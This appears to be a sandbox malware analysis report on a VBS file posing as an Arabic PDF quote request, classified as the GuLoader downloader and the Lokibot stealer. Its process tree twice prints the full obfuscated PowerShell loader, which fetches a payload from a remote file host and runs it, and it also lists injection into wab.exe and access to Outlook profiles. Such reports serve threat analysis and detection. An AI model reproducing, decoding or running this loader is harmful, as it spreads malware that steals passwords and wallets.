Overview

overview

10

Static

static

1

طلب ع�...df.vbs

windows7-x64

10

طلب ع�...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    63s
  • max time network
    100s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-04-2024 10:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    طلب عرض أسعار 24-04-07 عاجل·pdf.vbs

  • Size

    673KB

  • MD5

    63d0112620a2fbdf45054eb6e76272fd

  • SHA1

    84688e43791d3894f677e06a21e2b7620af4fc6c

  • SHA256

    07fbccab3124ab65980a177e294d10fdfdd1109cff3c618dc88e43489370d7de

  • SHA512

    bf7b66fcb7d5de7aab712956812ef0cfa1407ad7819b2090711b566a2084762bc2c8ff60e544de830ef54c4fe17c3509647a73eafe3b3933da4b6ef1071a7423

  • SSDEEP

    12288:0DGOTYy5NHBv1EV2G96irLVoPBiSl0aAsNOPD:0CO1XHBOQm6irLfSlX2

Score
10/10
guloaderlokibotcollectiondownloaderspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\طلب عرض أسعار 24-04-07 عاجل·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Chesterfieldstolen = 1;$Catholicisers='Substrin';$Catholicisers+='g';Function Chassiss($skiddier){$mnemonicalist=$skiddier.Length-$Chesterfieldstolen;For($daisies=7; $daisies -lt $mnemonicalist; $daisies+=(8)){$Despiteful+=$skiddier.$Catholicisers.Invoke($daisies, $Chesterfieldstolen);}$Despiteful;}function Plyssofa($Benzoazurine){& ($Slagsvrdet) ($Benzoazurine);}$fulgte=Chassiss 'PasternMFeminisoFremkalz Papir,iFunipenl Co.latlKollegaaRiberjy/Palisan5Zonel,v.Idealis0,raniid Connell(StellerW EuforiiBakshisn.naphaldSiddeploBarto.ewtrachelsFrih,ds Missi nNMi,ieuaT Tillav I,ponde1 Staal,0Dorsoab.Furma.p0Poritid;Preacid EksistW Syn,nyiBarratensponsor6Fiberri4Substit; B,sine Au olysxYverssh6Ilselil4Kabelfa; Clink, StandplrAdstrinv abstin:Emacia 1 Unopin2 Chlorp1Interst. Delgge0Direkti)speaker ,etadioGGrnsevae Unstatc TidsinkRectituo hjl,ep/ Beskyt2B,rahir0nazific1Ud,lusn0Skatter0 oxipho1Persona0Ve.dens1deburse definerFPortioviH.potherGirnylieDismissfMulli,aoIllhumoxGry nde/ Ekspor1Landsti2Dishle,1Sini.ri.Predisg0Qu,keri ';$Pres=Chassiss 'TilslutUAktivsts ,retreeRef.ygtrStill,o- BogtilA Befol,gFos.erheNitrosonBrod ritEnventu ';$Capitulate=Chassiss ' SejsinhStasiest bib.iotStitchep cotizes Raafru:Irrepre/Mu,krak/S.rkkesdTugthusrStudentiRyslerevVeslss.eNondram.KondemngFremskroskeanocoKommunigKlisteslDex rogebran,he.,orskrkc Neologos.gillsm Gameto/T easuru ma kemcJugosla?Lixiviuedrkarm,xMetodikpUntougho ApplaurGloweritSailori=PreventdIndictioInstituwPrecompnPippierlMarcelloKatodesaAllro,ndSuve,ni&CataphriStoededdPhotomi=Insidi 1 InboarfmilieukrCeremonRSkring,nQuarterHRoisterE StandpzYe,tereBvid.esbASlugssc5H gvaabAKonvertkArbejd cCascadihPolitif0.etsvidJ Quinte7RenovatgUnbalanWWateri zImpetigJThegethUDoktrinJ RepsbioTppebelnStr kseTLyophi,9TentorijKalkeremRemoras9 HvidtehT umbnudPaagrib ';$Unbragged=Chassiss 's.wsopr> Grilni ';$Slagsvrdet=Chassiss 'S rappeiSpu,sjee spermaxNonliab ';$Fikseret = Chassiss ' TraditeAsparagcTerritoh,nddrivoApplaus Clinoc.% Undst agr.ttrrp,ftercopFor rmedFladbaradebursetLepid,laShinapu% Videre\ SpapegVIndkaldoOr estrl PraediuBlond nmRepubliiAlgeforsDadledetOrganis2 Aren,r5O,latba3Unrequi.FendereUAccessinKvell.rdSlutvrd Gloeosp& Amne i&Wan.hil RaastofeSublongcOve,tjrhSheikdoo Trache Bedampr$ Per on ';Plyssofa (Chassiss ' Tilm.l$Uphealsg Rek.aml Eksl,boRe.slokbSubluxaaConvenalRock.ay:vinte.tA tyst erPi essecS,apsflhyoghouricirkulepSpottefrUn ighte UmusiksGammahebSplayfoyBendermtLalophoeOliventr Skrvi.=Nongenu( SunlescPensivemanti,bedArge eb Hamlin/KanuttecArbe.ds Retf,di$MeddlinF aityahiEfterrakStakaa s DouseseRewax.drOrganereRaacremtSuttefl)Supera, ');Plyssofa (Chassiss ',ffekte$Begr vegNonguilldeadpanoUdsprinbBet,geta,aginoslTha.sap:Sub,abiBParochiaBojsskraAfventenAmanu,ndWellrinj aisybue Badek,r InsinunVanilleeLemosi tValfart=Brotsik$FnblgerC,gersneaForlagspPar,ipoiZoftigktSlavishuskudtsml archstaNat ralt,ghalfaeStandar.flockedsProcelepLngdemal XanthaiBaglandtScarfec( onnom$UnderfaUudka tenS vevogb BabesirFort,lda WeepdogThewhelgUnorganeAtom,tsdDdninge)Perame. ');$Capitulate=$Baandjernet[0];Plyssofa (Chassiss ' Svin.e$SkummetgSalgbarl,andlbsoS,ngforbSc,apyaaGaskamml Pusten:DermochAEleva bm,awrglep MercillW,eylike xtensixdenethoi,efiniefOutstaroHjremarlSo astyi Mart.raBrndglatLosersbeMedidia=LjpeclaNDeviatieDumontiw S ggab-EurytmiO.orpagtbReasso,jMah,lseeDiverticLaste,ptHyrdetp Fu,horcSPl stify semineshyperpetFrypan eBundiesmLouisss.un,orphNLedeordeReactiotBodef,l.ActiondWHoldoveeEksekutb SnapshCMaximill UnarraiSkrum.eeNsteropn MidfietJagtsel ');Plyssofa (Chassiss 'Slaveha$ PelhamATeleph,mfe tivapSitre,llGawaindeTeguaaex gymn,siDisul,ifScoutheoBethesdl SjlevaiAscitanaMesati,t,chelooePunc ua.SpatingHladyshieBenpibeaSlugterdSmaa ageOpstillrKniplebsKemptke[Bollern$Supers,PB,lkirkrQua,tereUnd rkasGliders]Meretes= omst.u$ PassatfNewfounuBluffnelBrev.ekgAnesthat,odelineNatbord ');$Purismen=Chassiss ' StudenASkurvenmSygevrepk.veretlchreoteeBow.ingxBrug rniOutstunfTwintleoSemistrlInachidiForrumsa Om ytntUniformePhyllox.NydeligDBlondenoj,sefaswCroupinnSkeetsflParret,oUnglo eaDisnatud lifteeFOutwasti SammenlMes.alleGazette(Immorte$ savl.dC,reoutlaSu.jectpKnog emio.servatVermeiluAkselaflImitatiaAntherit UnderceUnder,h,Steppen$kvivaleH Gr.duaiF.rmninpReconvepbuzuk so Count cScrapabaInter am OverflprecapituSlumsstsBre,sni)Skatter ';$Purismen=$Archipresbyter[1]+$Purismen;$Hippocampus=$Archipresbyter[0];Plyssofa (Chassiss 'Pjokked$ Kirtelg .bbandlStadighoStrengebTelefo,aAichmoplspndi,g:KinatrtDD fensoiArol.apsUnpas isTiltnktaFollicutScamminiKiloerssAktiebrfPrefunea dourscTilho.dtSteroidiGuerdonoRomanamnFrancho=.ationa(Sarco,aTUnapprieDacaponsRenardutKo.sekv-ChartopPBluseraaFirebirtvrinskehHe,rewi Am,igui$LgrscofH RigsbliFunk iop O.ringpIna.suaoTh ottlchokuspoaSym,olimBottlespelectrouProtokos Udlan )Iagttag ');while (!$Dissatisfaction) {Plyssofa (Chassiss 'myoxusd$NordstlgVlvernel PelorioVendbarbKrltoppaMilieuslProfess:EngangsP FrtidsaUnpo.inr.yecivitPigebekiHvlvingkAnomorhuMilitanl,rugtburBegrebs1Unappri2D.aconc1Sociolo= Dorm t$ResorpttUnh stirburghaluInceptie Adiaph ') ;Plyssofa $Purismen;Plyssofa (Chassiss 'WordablSBlareddtAlders aMisteacr Eutaxit Obelis-CentralSProsacrlWorrieceAlderdoeSp rtsmpFa.vefi Recompo4Lymphad ');Plyssofa (Chassiss 'Hy ernu$Easgfilg Afsttel SnipruoPrveudtbBnkevllaMat imolIndfrsl: ChinovD Karyoli.ypodiasInst uksMartiala MonofotD mmeceiTransitsTusayanfGordiaca Konfunc,esputttLifeliniNabolagoCascalon Weirdl= Sepulc(K ibskeT NylghaeFarvebasAppelatt,agabon-ResoldePStrygeta bhenrytResoluthaf,laps Kontoha$LnmodtaHfors.iniBr.planpopfejunpAfsvovloLinolencRablenda rumhormEtaminepCircumfuKi kesasstorhje)Ana,rip ') ;Plyssofa (Chassiss 'Mejerie$SkyggergNontypolFor,irroApproxib ahoossaOp prtnlSubinde:Konsulap ModernaPerversaSubstitk Metam.lCentne dDackeretAfs itsehalvernsShoebin=kuponkl$Baan.opgOpsnus,l For,ytoB anycabCentralaVendinglPhyll s:s.stemuASyrliger ElizabeOmskolicfrilggeaTckcheii KlagesnCarrome+Lnninge+Torval,% Trolig$DiagnosB End.tra,tyrtbja.hlorsanFlgagtid UnderfjUnfa,sieDa,ghinrBygher nK,liumseJaculattP riode. MonikacAbstergoTrvenesuTachinanOpponentkontak. ') ;$Capitulate=$Baandjernet[$paakldtes];}Plyssofa (Chassiss 'Marg.ri$Sivs.oegOxal.aclbri,ettoSvingssbLuftarta C.untelLegemli:G.ldeskt T,wdryi,orpholl SunieasBurinisiRevampwd Auri.ceKlokkebserhverva Dulcintunivers Spende =Ex,ress Tppeb.nGVarmbloe Sile.ct Justit-Bir remCslagva.oManoeuvnNillerbt Semic,ep,eudornCoscorotundervi Adelas$Kolonn,HBystateiInnavigpOf erabpOutriggo forbruc Pen,elaUdbyttemEmpetrapVitt.ssu Primusstermin, ');Plyssofa (Chassiss 'Idiotie$F,mrecegBagstrblFirmastocarnivobAndreaeaStbego,l.oodsno:NervosaDGasma.eaOmdispobGaidropb Gymnogl Spo,skeR stren Bordpla=Aflever Unobst[SopraneS MulligyTilbjelsUdbedretKlasketeReabridmStach r.HyperalC Vindsto vistynLimpkinv isgrebeNelumbor BrandstDisenfr],okocom:Fljlshy:Overor,Fpaatnktr OrbicuoFigeatemRehandlBLlendepaErnrings Supe,beLandb,u6Vacilla4 HervarSLivery.tPhilantrHumor,siP.stsign Gu sjagGlycero(Aabenra$ SammentPrecouni Shulscl Mi ines stilkjiPoliessd,enslikeKortslusSkafferarestitut Uhygge)Klassik ');Plyssofa (Chassiss ' Liane.$Grskar,gFyl,ninlskramleo H.stanbLemmernaGast oslArrange: R,gnskI isendenVulgaridSheppiclAs matiaF.derskdSvinekae Pillorn,nsombrh ExcerpeSubepocdSv jryg Rudbeck=Vocatio Ichth.o[StorgaaS C,twatyFeudalvsMistendt PrexieeA,verszmeuphemy. ocktaiTEuphorieSubstitxTato,ertShe.pdo.DevelopE VallecnMullidac Satiato CarlsodS,gnaliiSterud,nTrgrnseg Theeki] Blaas :Plusgra:KaffeekA ExtrapS Acosm,CCollienI AfskydIGl sroe.F.ykaprGEnto one T ermot,elepunSUdvideltIndoktrrHandiwoiAktiebrn T pvingU sprjt( Tropho$Ekspor DSemiquaaChrysopbQuietagbFortsaelzebu toeGeog.af)Arrogan ');Plyssofa (Chassiss ' sorrow$Gallicig Chatt.lLivmodeoUntheweb ilsynsa SlatewlAlban,b: Xyl,phFNonideorUdmeldeeBrikvvemBer.harsNonconctMarmorsi HobbyelBlseblgl VerveceGennemslTaperers Hvdedee GenaabnIndsendsSpndbet=Subcit,$StarnelI TransfnDdsikred Efterkl BespotaSkavekndMode nie Procedn Duvninh yrefgteBatteridmicroel.Eg rners Nar.skuOevelsebKalendesUnse tatAntarchrUnco,ioiEstma knFr,dragg.olyhis( Enigma2 Observ8Insisti8Valenti1 fabul.6Sordine4 Kingpi,Ageusti3Aandsvr0Striml 8Socages0Incudes8Jagtenb)Dkvinge ');Plyssofa $Fremstillelsens;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:744
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Volumist253.Und && echo $"
        3⤵
          PID:2920
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Chesterfieldstolen = 1;$Catholicisers='Substrin';$Catholicisers+='g';Function Chassiss($skiddier){$mnemonicalist=$skiddier.Length-$Chesterfieldstolen;For($daisies=7; $daisies -lt $mnemonicalist; $daisies+=(8)){$Despiteful+=$skiddier.$Catholicisers.Invoke($daisies, $Chesterfieldstolen);}$Despiteful;}function Plyssofa($Benzoazurine){& ($Slagsvrdet) ($Benzoazurine);}$fulgte=Chassiss 'PasternMFeminisoFremkalz Papir,iFunipenl Co.latlKollegaaRiberjy/Palisan5Zonel,v.Idealis0,raniid Connell(StellerW EuforiiBakshisn.naphaldSiddeploBarto.ewtrachelsFrih,ds Missi nNMi,ieuaT Tillav I,ponde1 Staal,0Dorsoab.Furma.p0Poritid;Preacid EksistW Syn,nyiBarratensponsor6Fiberri4Substit; B,sine Au olysxYverssh6Ilselil4Kabelfa; Clink, StandplrAdstrinv abstin:Emacia 1 Unopin2 Chlorp1Interst. Delgge0Direkti)speaker ,etadioGGrnsevae Unstatc TidsinkRectituo hjl,ep/ Beskyt2B,rahir0nazific1Ud,lusn0Skatter0 oxipho1Persona0Ve.dens1deburse definerFPortioviH.potherGirnylieDismissfMulli,aoIllhumoxGry nde/ Ekspor1Landsti2Dishle,1Sini.ri.Predisg0Qu,keri ';$Pres=Chassiss 'TilslutUAktivsts ,retreeRef.ygtrStill,o- BogtilA Befol,gFos.erheNitrosonBrod ritEnventu ';$Capitulate=Chassiss ' SejsinhStasiest bib.iotStitchep cotizes Raafru:Irrepre/Mu,krak/S.rkkesdTugthusrStudentiRyslerevVeslss.eNondram.KondemngFremskroskeanocoKommunigKlisteslDex rogebran,he.,orskrkc Neologos.gillsm Gameto/T easuru ma kemcJugosla?Lixiviuedrkarm,xMetodikpUntougho ApplaurGloweritSailori=PreventdIndictioInstituwPrecompnPippierlMarcelloKatodesaAllro,ndSuve,ni&CataphriStoededdPhotomi=Insidi 1 InboarfmilieukrCeremonRSkring,nQuarterHRoisterE StandpzYe,tereBvid.esbASlugssc5H gvaabAKonvertkArbejd cCascadihPolitif0.etsvidJ Quinte7RenovatgUnbalanWWateri zImpetigJThegethUDoktrinJ RepsbioTppebelnStr kseTLyophi,9TentorijKalkeremRemoras9 HvidtehT umbnudPaagrib ';$Unbragged=Chassiss 's.wsopr> Grilni ';$Slagsvrdet=Chassiss 'S rappeiSpu,sjee spermaxNonliab ';$Fikseret = Chassiss ' TraditeAsparagcTerritoh,nddrivoApplaus Clinoc.% Undst agr.ttrrp,ftercopFor rmedFladbaradebursetLepid,laShinapu% Videre\ SpapegVIndkaldoOr estrl PraediuBlond nmRepubliiAlgeforsDadledetOrganis2 Aren,r5O,latba3Unrequi.FendereUAccessinKvell.rdSlutvrd Gloeosp& Amne i&Wan.hil RaastofeSublongcOve,tjrhSheikdoo Trache Bedampr$ Per on ';Plyssofa (Chassiss ' Tilm.l$Uphealsg Rek.aml Eksl,boRe.slokbSubluxaaConvenalRock.ay:vinte.tA tyst erPi essecS,apsflhyoghouricirkulepSpottefrUn ighte UmusiksGammahebSplayfoyBendermtLalophoeOliventr Skrvi.=Nongenu( SunlescPensivemanti,bedArge eb Hamlin/KanuttecArbe.ds Retf,di$MeddlinF aityahiEfterrakStakaa s DouseseRewax.drOrganereRaacremtSuttefl)Supera, ');Plyssofa (Chassiss ',ffekte$Begr vegNonguilldeadpanoUdsprinbBet,geta,aginoslTha.sap:Sub,abiBParochiaBojsskraAfventenAmanu,ndWellrinj aisybue Badek,r InsinunVanilleeLemosi tValfart=Brotsik$FnblgerC,gersneaForlagspPar,ipoiZoftigktSlavishuskudtsml archstaNat ralt,ghalfaeStandar.flockedsProcelepLngdemal XanthaiBaglandtScarfec( onnom$UnderfaUudka tenS vevogb BabesirFort,lda WeepdogThewhelgUnorganeAtom,tsdDdninge)Perame. ');$Capitulate=$Baandjernet[0];Plyssofa (Chassiss ' Svin.e$SkummetgSalgbarl,andlbsoS,ngforbSc,apyaaGaskamml Pusten:DermochAEleva bm,awrglep MercillW,eylike xtensixdenethoi,efiniefOutstaroHjremarlSo astyi Mart.raBrndglatLosersbeMedidia=LjpeclaNDeviatieDumontiw S ggab-EurytmiO.orpagtbReasso,jMah,lseeDiverticLaste,ptHyrdetp Fu,horcSPl stify semineshyperpetFrypan eBundiesmLouisss.un,orphNLedeordeReactiotBodef,l.ActiondWHoldoveeEksekutb SnapshCMaximill UnarraiSkrum.eeNsteropn MidfietJagtsel ');Plyssofa (Chassiss 'Slaveha$ PelhamATeleph,mfe tivapSitre,llGawaindeTeguaaex gymn,siDisul,ifScoutheoBethesdl SjlevaiAscitanaMesati,t,chelooePunc ua.SpatingHladyshieBenpibeaSlugterdSmaa ageOpstillrKniplebsKemptke[Bollern$Supers,PB,lkirkrQua,tereUnd rkasGliders]Meretes= omst.u$ PassatfNewfounuBluffnelBrev.ekgAnesthat,odelineNatbord ');$Purismen=Chassiss ' StudenASkurvenmSygevrepk.veretlchreoteeBow.ingxBrug rniOutstunfTwintleoSemistrlInachidiForrumsa Om ytntUniformePhyllox.NydeligDBlondenoj,sefaswCroupinnSkeetsflParret,oUnglo eaDisnatud lifteeFOutwasti SammenlMes.alleGazette(Immorte$ savl.dC,reoutlaSu.jectpKnog emio.servatVermeiluAkselaflImitatiaAntherit UnderceUnder,h,Steppen$kvivaleH Gr.duaiF.rmninpReconvepbuzuk so Count cScrapabaInter am OverflprecapituSlumsstsBre,sni)Skatter ';$Purismen=$Archipresbyter[1]+$Purismen;$Hippocampus=$Archipresbyter[0];Plyssofa (Chassiss 'Pjokked$ Kirtelg .bbandlStadighoStrengebTelefo,aAichmoplspndi,g:KinatrtDD fensoiArol.apsUnpas isTiltnktaFollicutScamminiKiloerssAktiebrfPrefunea dourscTilho.dtSteroidiGuerdonoRomanamnFrancho=.ationa(Sarco,aTUnapprieDacaponsRenardutKo.sekv-ChartopPBluseraaFirebirtvrinskehHe,rewi Am,igui$LgrscofH RigsbliFunk iop O.ringpIna.suaoTh ottlchokuspoaSym,olimBottlespelectrouProtokos Udlan )Iagttag ');while (!$Dissatisfaction) {Plyssofa (Chassiss 'myoxusd$NordstlgVlvernel PelorioVendbarbKrltoppaMilieuslProfess:EngangsP FrtidsaUnpo.inr.yecivitPigebekiHvlvingkAnomorhuMilitanl,rugtburBegrebs1Unappri2D.aconc1Sociolo= Dorm t$ResorpttUnh stirburghaluInceptie Adiaph ') ;Plyssofa $Purismen;Plyssofa (Chassiss 'WordablSBlareddtAlders aMisteacr Eutaxit Obelis-CentralSProsacrlWorrieceAlderdoeSp rtsmpFa.vefi Recompo4Lymphad ');Plyssofa (Chassiss 'Hy ernu$Easgfilg Afsttel SnipruoPrveudtbBnkevllaMat imolIndfrsl: ChinovD Karyoli.ypodiasInst uksMartiala MonofotD mmeceiTransitsTusayanfGordiaca Konfunc,esputttLifeliniNabolagoCascalon Weirdl= Sepulc(K ibskeT NylghaeFarvebasAppelatt,agabon-ResoldePStrygeta bhenrytResoluthaf,laps Kontoha$LnmodtaHfors.iniBr.planpopfejunpAfsvovloLinolencRablenda rumhormEtaminepCircumfuKi kesasstorhje)Ana,rip ') ;Plyssofa (Chassiss 'Mejerie$SkyggergNontypolFor,irroApproxib ahoossaOp prtnlSubinde:Konsulap ModernaPerversaSubstitk Metam.lCentne dDackeretAfs itsehalvernsShoebin=kuponkl$Baan.opgOpsnus,l For,ytoB anycabCentralaVendinglPhyll s:s.stemuASyrliger ElizabeOmskolicfrilggeaTckcheii KlagesnCarrome+Lnninge+Torval,% Trolig$DiagnosB End.tra,tyrtbja.hlorsanFlgagtid UnderfjUnfa,sieDa,ghinrBygher nK,liumseJaculattP riode. MonikacAbstergoTrvenesuTachinanOpponentkontak. ') ;$Capitulate=$Baandjernet[$paakldtes];}Plyssofa (Chassiss 'Marg.ri$Sivs.oegOxal.aclbri,ettoSvingssbLuftarta C.untelLegemli:G.ldeskt T,wdryi,orpholl SunieasBurinisiRevampwd Auri.ceKlokkebserhverva Dulcintunivers Spende =Ex,ress Tppeb.nGVarmbloe Sile.ct Justit-Bir remCslagva.oManoeuvnNillerbt Semic,ep,eudornCoscorotundervi Adelas$Kolonn,HBystateiInnavigpOf erabpOutriggo forbruc Pen,elaUdbyttemEmpetrapVitt.ssu Primusstermin, ');Plyssofa (Chassiss 'Idiotie$F,mrecegBagstrblFirmastocarnivobAndreaeaStbego,l.oodsno:NervosaDGasma.eaOmdispobGaidropb Gymnogl Spo,skeR stren Bordpla=Aflever Unobst[SopraneS MulligyTilbjelsUdbedretKlasketeReabridmStach r.HyperalC Vindsto vistynLimpkinv isgrebeNelumbor BrandstDisenfr],okocom:Fljlshy:Overor,Fpaatnktr OrbicuoFigeatemRehandlBLlendepaErnrings Supe,beLandb,u6Vacilla4 HervarSLivery.tPhilantrHumor,siP.stsign Gu sjagGlycero(Aabenra$ SammentPrecouni Shulscl Mi ines stilkjiPoliessd,enslikeKortslusSkafferarestitut Uhygge)Klassik ');Plyssofa (Chassiss ' Liane.$Grskar,gFyl,ninlskramleo H.stanbLemmernaGast oslArrange: R,gnskI isendenVulgaridSheppiclAs matiaF.derskdSvinekae Pillorn,nsombrh ExcerpeSubepocdSv jryg Rudbeck=Vocatio Ichth.o[StorgaaS C,twatyFeudalvsMistendt PrexieeA,verszmeuphemy. ocktaiTEuphorieSubstitxTato,ertShe.pdo.DevelopE VallecnMullidac Satiato CarlsodS,gnaliiSterud,nTrgrnseg Theeki] Blaas :Plusgra:KaffeekA ExtrapS Acosm,CCollienI AfskydIGl sroe.F.ykaprGEnto one T ermot,elepunSUdvideltIndoktrrHandiwoiAktiebrn T pvingU sprjt( Tropho$Ekspor DSemiquaaChrysopbQuietagbFortsaelzebu toeGeog.af)Arrogan ');Plyssofa (Chassiss ' sorrow$Gallicig Chatt.lLivmodeoUntheweb ilsynsa SlatewlAlban,b: Xyl,phFNonideorUdmeldeeBrikvvemBer.harsNonconctMarmorsi HobbyelBlseblgl VerveceGennemslTaperers Hvdedee GenaabnIndsendsSpndbet=Subcit,$StarnelI TransfnDdsikred Efterkl BespotaSkavekndMode nie Procedn Duvninh yrefgteBatteridmicroel.Eg rners Nar.skuOevelsebKalendesUnse tatAntarchrUnco,ioiEstma knFr,dragg.olyhis( Enigma2 Observ8Insisti8Valenti1 fabul.6Sordine4 Kingpi,Ageusti3Aandsvr0Striml 8Socages0Incudes8Jagtenb)Dkvinge ');Plyssofa $Fremstillelsens;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2668
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Volumist253.Und && echo $"
            4⤵
              PID:4452
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:2548

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_te5u4yve.r4y.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\newmanize.txt
        Filesize

        3KB

        MD5

        68d351186e409c9d3171921852b37005

        SHA1

        8eb9ba110976d9cdeeb83c76d4483ffd2c62e8ce

        SHA256

        d3d909110c577542e6611ac3c59142f0a3a49cad690cb40a20f603de15fc7839

        SHA512

        1142ca89669e5bb0c0d8791cfb0d29002f422fb0ab2e128ce224fa9b0abbf4929739178b5740ddbd25a48c3281c60147c2c97bf9f33396a6eda31aa66b0e9c6c

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\newmanize.txt
        Filesize

        4KB

        MD5

        ad0770fde8d50127a86abde43d14c072

        SHA1

        94ee9f93758f24784eb411d13322bc8a266185af

        SHA256

        8527eb1d8e8b129c6f9b7ae90d6445c348f7275a7ff8a0402474fa77c375075a

        SHA512

        cf585097c3b550dfd347a98e1e4efcc24ff618608c3bf4ed87cc8151f3eb637cfae773a339852bf09167dacde6bf3edffabef475ee08bf84d857de47a521ed15

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\newmanize.txt
        Filesize

        4KB

        MD5

        30ee438d3203e38b5a0e8afd4b34b592

        SHA1

        74bfaeaf49aeb4dba3ee176df781c67b9df8ba89

        SHA256

        1c586ba82358c7bab32f2f6cc09b0222541bb2a6d7b8918e661d8bdeeb05ac93

        SHA512

        8fb2e47aa8ec08400b9b18107aafd73df37b2c04b5178faa5807b3ec6bfcc4112ed4299fcec1a496b9e9acda27ee5829896e8b4b911d70d37ec67f6148dc4ba0

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\newmanize.txt
        Filesize

        1KB

        MD5

        f208ac4d2c1155f2cfaddb14aa62ea32

        SHA1

        1d444280175a3616259290e57c38123d31f0de1a

        SHA256

        8ba1fcdb2efb4e3dfa6daccf1ed125be03e325cb112c4616d62c6bf99e22d350

        SHA512

        1fc28d8ea9c649f8dc3a8484c8e17f995bbab05d6c621e18b886895610188b67a60fe7895ad927dc2d244cbee190a531803fca26d4e818ba245b0ed228e6863f

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\newmanize.txt
        Filesize

        2KB

        MD5

        e46536ef644ed7e60e185db9fb34597d

        SHA1

        1bc0fa256f88861468ffe273310ed78aee4ecf96

        SHA256

        4e2a1ee04f06de935ec2eba72302a6d637cbe34fd987200e7dc507bd16abcb36

        SHA512

        ab95ab428e362b1b4ed954578029ffb28692dddcfbff30d1cdfede68ad98566f574981a91d1c07fd0d8c6dc443f3348f29fdcccc03903f50cd01d5823d3f0908

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Volumist253.Und
        Filesize

        415KB

        MD5

        fcf5291e3a9bbabd4d59d775938d5216

        SHA1

        d61bf5f35325c577f14627a3a46287dd28629fd4

        SHA256

        47ae43c0426deb818e772aa12c00bcad8586210b3613468ed7cfd355db18fedb

        SHA512

        f3ad2b4aaf78166549b715035f28292b5b31fada817b4aa1f1f2a6506512c11d26d3fe5e32ab13d3e939db8269005454a7e0e7f93ec98e5274e95789bb90f868

        Download Submit
      • memory/744-315-0x000002336FB50000-0x000002336FB72000-memory.dmp
        Filesize

        136KB

        Download
      • memory/744-326-0x000002336FBF0000-0x000002336FC00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/744-327-0x000002336FBF0000-0x000002336FC00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/744-328-0x000002336FBF0000-0x000002336FC00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/744-359-0x000002336FBF0000-0x000002336FC00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/744-360-0x000002336FBF0000-0x000002336FC00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/744-358-0x00007FFDCE690000-0x00007FFDCF151000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/744-325-0x00007FFDCE690000-0x00007FFDCF151000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/2548-404-0x0000000000400000-0x00000000005E4000-memory.dmp
        Filesize

        1.9MB

        Download
      • memory/2548-400-0x0000000000400000-0x00000000005E4000-memory.dmp
        Filesize

        1.9MB

        Download
      • memory/2548-415-0x0000000000400000-0x00000000005E4000-memory.dmp
        Filesize

        1.9MB

        Download
      • memory/2548-417-0x0000000000400000-0x00000000005E4000-memory.dmp
        Filesize

        1.9MB

        Download
